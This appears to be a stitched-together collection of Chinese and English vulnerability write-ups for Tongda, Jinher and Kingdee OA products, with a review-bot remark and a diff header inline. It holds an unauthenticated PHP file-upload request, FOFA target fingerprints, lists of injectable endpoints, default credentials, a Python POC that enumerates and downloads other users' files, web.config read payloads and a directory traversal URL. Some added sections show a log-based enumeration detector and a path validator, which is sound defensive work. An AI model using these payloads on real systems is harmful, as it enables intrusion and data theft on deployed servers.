通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞
## 漏洞影响
```
通达OA v2017
```
## FOFA
```
app="TDXK-通达OA"
```
## 漏洞复现
访问获取版本信息
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091053148.png)
发送请求包上传任意文件
```php
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 893
Content-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
ffff
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
1000000000
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[filePathFormat]"
tcmd
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
.php
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="mufile"
submit
-----------------------------55719851240137822763221368724--
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091053293.png)
再访问上传的文件
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091053249.png)
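Review bot: the file has no top-level title; it opens at `## 漏洞描述`, while every other file in this commit starts with a `# <product> <endpoint> <vulnerability>` heading. The HTTP request is fenced as ```php although it is a raw multipart request (the upsharestatus file uses ```plain for the same kind of block), and the `Host:` header is left empty. No remediation or fixed version is recorded for `action_upload.php`.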

@ -0,0 +1,71 @@
# 通达OA 部分漏洞信息整合
## 通达OA信息收集
```plain
http[s]://TongDaOA.domain/inc/expired.php 判断通达版本
http[s]://TongDaOA.domain/inc/reg_trial.php
http[s]://TongDaOA.domain/inc/reg_trial_submit.php
http[s]://TongDaOA.domain/ispirit/retrieve_pwd.php
GET 参数username、email 可爆用户、邮箱
http[s]://TongDaOA.domain/resque/worker.php 计算机名
```
## 2013-2017(SQLi path)
```plain
http[s]://TongDaOA.domain/module/crm2010/imageOperation/deleteImage.php
http[s]://TongDaOA.domain/module/crm2010/product/type_tree.php
http[s]://TongDaOA.domain/module/crm2010/select/getData.php
http[s]://TongDaOA.domain/module/crm2010/select/getValue.php
http[s]://TongDaOA.domain/module/crm2010/select/index.php
http[s]://TongDaOA.domain/module/crm2010/share/update.php
http[s]://TongDaOA.domain/portal/webportals/source/oa/news.php
http[s]://TongDaOA.domain/portal/webportals/source/oa/notify.php?LOGIN_USER_ID=
http[s]://TongDaOA.domain/task/crm/account_care_remind.php
http[s]://TongDaOA.domain/task/crm/action_link_remind.php
http[s]://TongDaOA.domain/task/crm/contract_birthday_remind.php
http[s]://TongDaOA.domain/task/crm/contract_near_remind.php
http[s]://TongDaOA.domain/task/crm/contract_remind.php
http[s]://TongDaOA.domain/task/crm/crm_account_contact_bir_remind.php
http[s]://TongDaOA.domain/task/crm/crm_complain_remind.php
http[s]://TongDaOA.domain/task/crm/crm_opportunity_status_remind.php
http[s]://TongDaOA.domain/task/crm/crm_salepay_remind.php
http[s]://TongDaOA.domain/task/crm/crm_stockout_remind.php
http[s]://TongDaOA.domain/task/crm/marketing_near_remind.php
http[s]://TongDaOA.domain/task/crm/order_to_stockout_remind.php
http[s]://TongDaOA.domain/task/crm/payment_near_remind.php
http[s]://TongDaOA.domain/task/crm/storage_near_remind.php
http[s]://TongDaOA.domain/ispirit/myoa.php
http[s]://TongDaOA.domain/ispirit/retrieve_pwd.php
```
## v11~v11.6 [0day]
```plain
http[s]://TongDaOA.domain/general/approve_center/list/roll_config.inc.php
http[s]://TongDaOA.domain/general/bi_design/reportshop/report_bi.func.php
http[s]://TongDaOA.domain/general/data_center/console/autocode/autocode.php
http[s]://TongDaOA.domain/general/data_center/model_design/console/autocode/autocode.php
http[s]://TongDaOA.domain/general/data_center/model_design/design/report/action.php
http[s]://TongDaOA.domain/general/reportshop/design/report/action.php
http[s]://TongDaOA.domain/general/project/portal/details/budget/table.php
http[s]://TongDaOA.domain/general/reportshop/design/report/console/autocode/autocode.php
http[s]://TongDaOA.domain/general/reportshop/workshop/report/attachment-remark/form3.php
http[s]://TongDaOA.domain/general/system/user/get_key_user_info.php
http[s]://TongDaOA.domain/general/workflow/list/roll_config.inc.php
http[s]://TongDaOA.domain/interface/GetNewAPP.php
http[s]://TongDaOA.domain/interface/GetNewAPP1.php
http[s]://TongDaOA.domain/general/workflow/plugin/turn/kd_k3_applly/kd_k3_applly.php
http[s]://TongDaOA.domain/general/workflow/document_list/roll_config.inc.php
```
## v11.6 [RCE]
```plain
http[s]://TongDaOA.domain/module/appbuilder/assets/print.php arbitrary file deletion
```
## References
[TongDa OA: some vulnerability points (GitHub)](https://github.com/OA-HUNTER/TongDa-OA.git)

# Jinher OA C6 DossierBaseInfoView.aspx post-login broken access control information disclosure vulnerability
## Vulnerability description
Jinher OA C6 has a broken access control information disclosure vulnerability: after logging in, an ordinary user can obtain sensitive information about administrators and other users by iterating ID numbers.
## Affected products
```
Jinher OA C6
```
## FOFA
```
app="Jinher-OA"
```
## Reproduction
Log in to the OA application back end as an ordinary user.
The POC URL to request is:
```plain
http://xxx.xxx.xxx.xxx/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330
```
- Note: RY120330 must be the actual user number of another existing user
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090135010.png)
Part of the user's sensitive information is disclosed.
## References
https://mp.weixin.qq.com/s/gwHQVIZeMWfT8a5lBX_4WA

# Jinher OA C6 OpenFile.aspx post-login broken access control sensitive file enumeration vulnerability
## Vulnerability description
Jinher OA C6 has a post-login broken access control sensitive file enumeration vulnerability: an ordinary user can obtain sensitive files uploaded by other users by iterating a particular parameter.
## Affected products
```
Jinher OA C6
```
## FOFA
```
app="Jinher-OA"
```
## Reproduction
Default credentials: admin/000000
After logging in, click 信息交流 (Information Exchange) and open the 发起协同 (Initiate Collaboration) page.
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090137424.png)
Upload an attachment and send it to the target.
- Here the logged-in account is an administrator, so we simply send it to ourselves; the steps above only show the thought process of discovering the vulnerability
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090137965.png)
The uploaded attachment is received successfully.
![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090138862.png)
Capturing the traffic when clicking to view the attachment reveals a request that carries the file ID.
![4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090138285.png)
Several parameters are returned:
```plain
var strFilePath = '../Resource/slaves/1/8b473ecb-7b39-4384-ada2-b0ec72c4f6ed.png';
var strFileType = 'png';
var strSid='3jvpvhs410m2wdbbficax5q5';
var strFileIDCode='us9w7xWE7do=';
var strId = '1229';
var strTxtReg = 'txt,ini,xml,config,htm,html,js,css,asp,aspx,jsp,cs,sql,inf,htc,log';
var strImgReg = 'jpg,gif,jpeg,png,ico';
var MD = '';
```
Note that strFilePath is the storage location of the file. We change the id parameter to another value; testing also shows that the name (file name) parameter is irrelevant.
![5](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090138702.png)
After changing the ID and resending the request, the information of a different file is returned.
When requesting the URL, note that the **type parameter** must be the correct file extension for the access to succeed.
```plain
http://xxx.xxx.xxx.xxx/C6/control/OpenFile.aspx?id=1200&name=&type=pdf
```
![6](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090138950.png)
Here we switch to an ordinary user to check whether this still works, and try iterating id.
![7](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090138469.png)
![8](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090139653.png)
If the **strFilePath parameter** is present, the file exists; if it is empty, the file no longer exists.
Capturing the file download page likewise shows the parameters that can be obtained:
**FileID and FileIDCode**
![9](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090139235.png)
So by iterating the ID as above to obtain these two key parameters, sensitive files sent by other people can be downloaded with only ordinary user privileges.
## Vulnerability POC
- The POC only checks whether the vulnerability exists; the vulnerable page is post-login, so a valid session cookie is required
- After running it, visiting the printed link downloads the file
```python
import re
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def title():
    print('+------------------------------------------')
    print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
    print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
    print('+ \033[34m公众号 : PeiQi文库 \033[0m')
    print('+ \033[34mVersion: 金和OA C6 \033[0m')
    print('+ \033[36m使用格式: python3 poc.py \033[0m')
    print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
    print('+------------------------------------------')


def POC_1(target_url, file_id, cookie):
    # OpenFile.aspx only checks that type matches the real extension; name is ignored
    vuln_url = target_url + "/C6/control/OpenFile.aspx?id={}&name=&type=pdf".format(file_id)
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": cookie
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        print("\033[36m[o] 正在请求 Url: {}\033[0m".format(vuln_url))
        if "strFilePath =" in response.text and response.status_code == 200:
            # The page embeds the file metadata as JavaScript variables; pull them out
            strFilePath = re.findall(r"var strFilePath = '(.*?)';", response.text)[0]
            strFileType = strFilePath[-3:]
            strFileIDCode = re.findall(r"var strFileIDCode='(.*?)';", response.text)[0]
            strId = re.findall(r"var strId = '(.*?)';", response.text)[0]
            # Session id from the supplied cookie (works with or without a trailing ';')
            sid = re.findall(r'ASP\.NET_SessionId=([^;]+)', cookie)[0]
            if strFilePath != "":
                print("\033[36m[o] 目标 {} 存在漏洞, 获取文件信息:\n[o] 文件路径:{}\n[o] 文件类型:{}\n[o] 文件ID code{}\n[o] 文件编号: {}\033[0m".format(target_url, strFilePath, strFileType, strFileIDCode, strId))
                print("\033[32m[o] 文件下载链接为: {}/C6/JHSoft.Web.CustomQuery/uploadFileDownLoad.aspx?Decrypt=&FileID={}&FileIDCode={}&sid={}\033[0m".format(target_url, strId, strFileIDCode, sid))
            else:
                print("\033[31m[x] 目标 {} 文件不存在 \033[0m".format(target_url))
        else:
            print("\033[31m[x] 目标 {} 不存在漏洞 \033[0m".format(target_url))
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    file_id = str(input("\033[35mFile_id >>> \033[0m"))
    cookie = str(input("\033[35mCookie >>> \033[0m"))
    POC_1(target_url, file_id, cookie)
```
![10](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090139356.png)
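Both Jinher C6 issues described above (DossierBaseInfoView.aspx with UserID, OpenFile.aspx with id) are identifier enumeration by an authenticated user, which shows up in the web server logs as one account requesting many distinct object IDs on the same endpoint. The following added example is not from the original write-up or the product: it parses constructed W3C-style access log lines (assumed field order: time, client IP, username, URI stem, query string, status) and flags users whose distinct-ID count on those endpoints reaches a threshold.

```python
from collections import defaultdict
from urllib.parse import parse_qs

# Endpoint (lower-cased URI stem) -> query parameter naming the object being fetched.
WATCHED = {
    "/c6/control/openfile.aspx": "id",
    "/c6/jhsoft.web.dossier/dossierbaseinfoview.aspx": "userid",
}

# Constructed sample log (not real traffic): "zhang" walks OpenFile.aspx ids 1195..1201
# and two Dossier UserIDs, while "li" opens a single file. Assumed field order:
# time c-ip cs-username cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = [
    f"09:00:{i:02d} 10.0.0.21 zhang /C6/control/OpenFile.aspx id={1195 + i}&name=&type=pdf 200"
    for i in range(7)
] + [
    "09:05:10 10.0.0.33 li /C6/control/OpenFile.aspx id=1229&name=&type=png 200",
    "09:06:00 10.0.0.21 zhang /C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx CollID=1&UserID=RY120330 200",
    "09:06:01 10.0.0.21 zhang /C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx CollID=1&UserID=RY120331 200",
]

def parse_line(line):
    """Split one log line into its six fields; returns None for malformed lines."""
    parts = line.split()
    if len(parts) != 6:
        return None
    time, ip, user, stem, query, status = parts
    return {"time": time, "ip": ip, "user": user, "stem": stem.lower(), "query": query, "status": status}

def distinct_ids(lines):
    """Map (user, endpoint) -> set of distinct object identifiers that user requested."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["stem"] not in WATCHED:
            continue
        param = WATCHED[rec["stem"]]
        params = {k.lower(): v for k, v in parse_qs(rec["query"]).items()}
        for value in params.get(param, []):
            seen[(rec["user"], rec["stem"])].add(value)
    return seen

def flag_enumeration(lines, threshold=5):
    """Return sorted [(user, endpoint, distinct_count)] for users at or above threshold."""
    return sorted((user, stem, len(ids)) for (user, stem), ids in distinct_ids(lines).items()
                  if len(ids) >= threshold)

if __name__ == "__main__":
    for user, stem, n in flag_enumeration(SAMPLE_LOG):
        print(f"possible enumeration: {user} requested {n} distinct ids on {stem}")
```

The threshold should be tuned per endpoint: a Dossier page is rarely opened for more than a handful of colleagues per session, while file opens are more frequent.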

# Jinher OA C6 download.jsp arbitrary file read vulnerability
## Vulnerability description
The download.jsp file of Jinher OA C6 has an arbitrary file read vulnerability; an attacker can use it to obtain sensitive information from the server.
## Affected products
```
Jinher OA
```
## FOFA
```
app="Jinher-OA"
```
## Reproduction
The login page looks like this:
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090141493.png)
The vulnerable file is download.asp:
```asp
<%
Response.Buffer = true
Response.Clear
dim url
Dim fso,fl,flsize
dim Dname
Dim objStream,ContentType,flName,isre,url1
'********************************************* File name to download, passed in by the caller
Dname=trim(request("filename"))
'******************************************************************
If Dname<>"" Then
    '****************************** Server-side directory where the download file is stored
    url=server.MapPath(Dname)
    'url=server.MapPath("./")&"\Jhsoft.Web.module\testbill\dj"&Dname ' Changed here by Fanshui
    '***************************************************
End If
'Response.write url
'response.end
Set fso=Server.CreateObject("Scripting.FileSystemObject")
Set fl=fso.getfile(url)
flsize=fl.size
flName=fl.name
Set fl=Nothing
Set fso=Nothing
'Response.write flName
'Response.write flsize
%>
<%
Set objStream = Server.CreateObject("ADODB.Stream")
'objStream.Mode = 3
objStream.Type = 1
objStream.Open
objStream.LoadFromFile url
Select Case lcase(Right(flName, 4))
    Case ".asf"
        ContentType = "video/x-ms-asf"
    Case ".avi"
        ContentType = "video/avi"
    Case ".doc"
        ContentType = "application/msword"
    Case ".zip"
        ContentType = "application/zip"
    Case ".xls"
        ContentType = "application/vnd.ms-excel"
    Case ".gif"
        ContentType = "image/gif"
    Case ".jpg", "jpeg"
        ContentType = "image/jpeg"
    Case ".wav"
        ContentType = "audio/wav"
    Case ".mp3"
        ContentType = "audio/mpeg3"
    Case ".mpg", "mpeg"
        ContentType = "video/mpeg"
    Case ".rtf"
        ContentType = "application/rtf"
    Case ".htm", "html"
        ContentType = "text/html"
    Case ".txt"
        ContentType = "text/plain"
    Case Else
        ContentType = "application/octet-stream"
End Select
Response.AddHeader "Content-Disposition", "attachment; filename=" & flName
Response.AddHeader "Content-Length", flsize
Response.Charset = "UTF-8"
Response.ContentType = ContentType
Response.BinaryWrite objStream.Read
Response.Flush
response.Clear()
objStream.Close
Set objStream = Nothing
%>
```
The POC request is:
```plain
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
```
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090141014.png)
Reading web.config:
```plain
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
```
![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090141775.png)
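download.asp hands the filename parameter straight to server.MapPath, so any file the web server account can read is returned, web.config included. The following added example (not part of the original write-up or the product) shows in Python, for illustration, the validation such a handler needs: the requested name must be a bare file name, carry an extension from the handler's own MIME table, and canonicalise to a path inside the intended testbill/dj directory; the base directory path is a constructed assumption.

```python
import os

# MIME table copied from the Select Case in download.asp; anything else is refused rather
# than falling through to application/octet-stream.
ALLOWED_TYPES = {
    ".asf": "video/x-ms-asf", ".avi": "video/avi", ".doc": "application/msword",
    ".zip": "application/zip", ".xls": "application/vnd.ms-excel", ".gif": "image/gif",
    ".jpg": "image/jpeg", ".jpeg": "image/jpeg", ".wav": "audio/wav", ".mp3": "audio/mpeg3",
    ".mpg": "video/mpeg", ".mpeg": "video/mpeg", ".rtf": "application/rtf",
    ".htm": "text/html", ".html": "text/html", ".txt": "text/plain",
}

def resolve_download(base_dir, requested):
    """Return (absolute_path, content_type) for an acceptable request, else None.

    base_dir is the only directory files may be served from (assumed, e.g. .../testbill/dj).
    """
    name = requested.strip()
    # 1. Bare file names only: no separators and no "." / ".." components, so
    #    "/c6/web.config" and "..\web.config" are refused before touching the file system.
    if not name or "/" in name or "\\" in name or name in (".", ".."):
        return None
    # 2. Extension allowlist: .config, .asp, .ini and the like never appear in the table.
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_TYPES:
        return None
    # 3. Defence in depth: canonicalise and confirm the result still lies under base_dir.
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, full]) != base:
        return None
    return full, ALLOWED_TYPES[ext]

if __name__ == "__main__":
    base = "/var/www/c6/Jhsoft.Web.module/testbill/dj"  # constructed path
    for req in ("report.doc", "/c6/web.config", "../../web.config", "..\\web.config", "shell.asp"):
        print(repr(req), "->", resolve_download(base, req))
```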

# Kingdee OA server_file directory traversal vulnerability
## Vulnerability description
Kingdee OA server_file has a directory traversal vulnerability; through it an attacker can obtain sensitive information about the server.
## Affected products
```
Kingdee OA
```
## FOFA
```
app="Kingdee-EAS"
```
## Reproduction
The login page is:
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090144781.png)
Vulnerability POC:
```plain
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
# Windows server
appmonitor/protected/selector/server_file/files?folder=C://&suffix=
# Linux server
appmonitor/protected/selector/server_file/files?folder=/&suffix=
```
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090144057.png)